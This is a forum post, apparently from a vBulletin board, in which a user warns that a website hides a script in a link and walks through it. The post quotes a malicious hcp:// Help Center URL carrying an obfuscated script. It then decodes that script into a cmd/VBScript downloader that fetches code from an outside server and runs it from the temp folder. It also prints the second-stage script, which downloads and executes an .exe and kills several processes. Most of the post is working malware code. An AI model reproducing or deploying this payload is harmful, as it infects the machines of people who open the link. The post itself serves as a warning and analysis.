hm you sure this is a trustable site?
the site contains a script hidden in a link
========================
hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A. .%5C..%5Csysinfomain.htm?svr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,3 2,101,99,104,111,32,66,61,34,108,46,118,98,115,34, 58,87,105,116,104,32,67,114,101,97,116,101,79,98,1 06,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76, 72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,6 9,84,34,44,34,104,116,116,112,58,47,47,114,97,102, 116,111,122,97,46,99,111,109,47,99,111,110,116,101 ,110,116,47,104,99,112,95,118,98,115,46,112,104,11 2,63,102,61,51,54,38,100,61,48,34,44,102,97,108,11 5,101,58,46,115,101,110,100,40,41,58,83,101,116,32 ,65,32,61,32,67,114,101,97,116,101,79,98,106,101,9 9,116,40,34,83,99,114,105,112,116,105,110,103,46,7 0,105,108,101,83,121,115,116,101,109,79,98,106,101 ,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114, 101,97,116,101,84,101,120,116,70,105,108,101,40,65 ,46,71,101,116,83,112,101,99,105,97,108,70,111,108 ,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,6 6,41,58,68,46,87,114,105,116,101,76,105,110,101,32 ,46,114,101,115,112,111,110,115,101,84,101,120,116 ,58,69,110,100,32,87,105,116,104,58,68,46,67,108,1 11,115,101,58,67,114,101,97,116,101,79,98,106,101, 99,116,40,34,87,83,99,114,105,112,116,46,83,104,10 1,108,108,34,41,46,82,117,110,32,65,46,71,101,116, 83,112,101,99,105,97,108,70,111,108,100,101,114,40 ,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,8 4,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32, 37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38 ,32,116,97,115,107,107,105,108,108,32,47,70,32,47, 73,77,32,104,101,108,112,99,116,114,46,101,120,101 )));</script>
========================
the colored part translated:
========================
cmd /c echo B="l.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","http://raftoza.com/content/hcp_vbs.php?f=36&d=0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe
========================
execute a vbs script, start the command shell, get code from
a website then execute the downloaded script
the code from the website http:// raftoza.com / content / hcp_vbs. php ?f=36 &d=0
========================
w=3000:x=200:y=1:z=false:a = "http://raftoza.com/w.php?e=7&f=36":Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")):Set f=e.GetSpecialFolder(2):b = f & "\exe.ex2":b=Replace(b,Month("2010-02-16"),"e"):OT = "GET":Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")):Set d = CreateObject(StrReverse("maertS.BDODA")) Set o=Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")) On Error resume next c.open OT, a, z:c.send() If c.Status = x Then d.Open:d.Type = y:d.Write c.ResponseBody:d.SaveToFile b:d.Close End If Set w=CreateObject(StrReverse("llehS." & "tpi"&"rcSW")) Eval(Replace("W.ex2c b", Month("2010-02-16"), "E")) W.eXeC "taskkill /F /IM wmplayer.exe":W.eXeC "taskkill /F /IM realplay.exe":Set g=o.GetFile(e.GetSpecialFolder(2) & "\" & StrReverse("bv.l") & "s"):g.Delete:WScript.Sleep w:Set g=o.GetFile(b):g.Delete
========================
this code connects again to the webserver and downloads an .exe file for example contact.ext, readme.exe ...
:banana:
vBulletin® v3.8.6, Copyright ©2000-2024, Jelsoft Enterprises Ltd.